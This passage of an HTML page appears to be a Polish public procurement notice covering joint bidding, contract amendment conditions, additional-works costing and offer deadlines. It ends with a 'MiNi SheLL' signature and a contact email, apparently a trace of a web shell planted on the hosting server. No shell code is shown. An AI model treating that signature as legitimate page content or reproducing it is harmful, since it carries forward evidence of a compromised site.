postępowaniu<br/>niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – wzór oświadczenia<br/>stanowi załącznik Nr 10 do SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie o<br/>przynależności lub braku przynależności do tej samej grupy kapitałowej, składa każdy z Wykonawców.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 10.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego.<br/>10.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenia o których mowa w pkt 8.1 SWZ składa z ofertą każdy<br/>z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w<br/>zakresie, w jakim każdy<br/>z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>b) w przypadku, o którym mowa w pkt 6.3 SWZ Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym.<br/>c) zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o<br/>których mowa w pkt 8.3 SWZ, przy czym podmiotowe środki dowodowe, o których mowa w pkt<br/>8.3.1 SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie<br/>warunku.<br/>10.3. Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają formy pisemnej w postaci<br/>aneksów do umowy, pod rygorem nieważności, z zastrzeżeniem postanowień Rozdziału II.<br/>niniejszej umowy.<br/>2. W przypadkach przewidzianych w umowie lub ustawie Prawo zamówień publicznych<br/>dopuszcza się możliwość wprowadzenia zmian za zgodą Zamawiającego.<br/>3. Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.<br/>4. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty na<br/>podstawie której dokonano wyboru Wykonawcy, chyba że nastąpiły następujące okoliczności<br/>uzasadniające zmiany:<br/>1) siła wyższa,<br/>2) zdarzenie losowe niezależne od stron,<br/>3) gwałtowne zdarzenia wywołane zewnętrznymi czynnikami,<br/>4) zmiana ilości robót budowlanych wynikających ze zmiany projektu, której nie dało się<br/>przewidzieć w dniu zawarcia umowy, a jest konieczna dla uzyskania efektu końcowego,<br/>5) inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna,<br/>ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca<br/>brakiem możliwości należytego wykonania umowy,<br/>6) zmiany stawki podatku VAT lub innych regulacji prawnych, obowiązujących przepisów,<br/>wprowadzonych w życie po dacie podpisania umowy,<br/>7) zmiana zakresu części zamówienia powierzonej Podwykonawcom;<br/>8) wg postanowień Rozdziału II.<br/>5. Zmiany, o których mowa w ust. 4 mogą dotyczyć:<br/>1) terminu realizacji umowy – dot. ust.4 pkt. 1-5,<br/>2) zakresu wynikającego z Rozdziału II wg postanowień Rozdziału II,<br/>3) ust. 4 pkt. 6 i 7 – zmiany zgodnie z zakresem wynikającym z postanowień tych punktów.<br/>6. Warunkiem dokonania zmian, o których mowa w ust. 2, jest złożenie wniosku przez stronę<br/>inicjującą zmianę zawierającego:<br/>1) opis propozycji zmiany,<br/>2) uzasadnienie zmiany,<br/>3) obliczenie kosztów zmiany zgodnie z zasadami zawartymi w umowie,<br/>4) opis wpływu zmiany na termin wykonania umowy,<br/>5) opis przyczyny zmiany terminu,<br/>6) dla zmian Rozdz.II – wg postanowień Rozdz.II.<br/>7. W przypadku konieczności wykonania robót dodatkowych, niemożliwych wcześniej do<br/>przewidzenia, które będą niezbędne do prawidłowego wykonania przedmiotu niniejszej umowy.<br/>8. Podstawą określenia wynagrodzenia za roboty dodatkowe będzie protokół konieczności<br/>uzgodniony przez Strony oraz kosztorysy sporządzone przez Wykonawcę, zatwierdzone przez<br/>ustanowionych inspektorów nadzoru inwestorskiego, z uwzględnieniem danych wyjściowych do<br/>kosztorysowania określonych poniżej:<br/>1) stawka r-g, wskaźnik kosztów pośrednich i zysku oraz ceny materiałów oraz ceny sprzętu nie<br/>większe niż średnie ceny publikowane w kwartalnej Informacji cenowej o cenach materiałów<br/>budowlanych, elektrycznych i instalacyjnych SEKOCENBUD, obowiązujących w danym okresie i<br/>zawierających ceny zakupu, a w przypadku ich braku według cen udokumentowanych i<br/>uzgodnionych z Zamawiającym,<br/>2) tak sporządzone kosztorysy po uprzednim ich sprawdzeniu i zatwierdzeniu przez<br/>Zamawiającego, będą stanowiły podstawę zmiany Wynagrodzenia Wykonawcy w formie aneksu do umowy/ umowy na roboty dodatkowe. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-14 14:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP (Elektronicznej Skrzynki Podawczej) i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-14 15:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com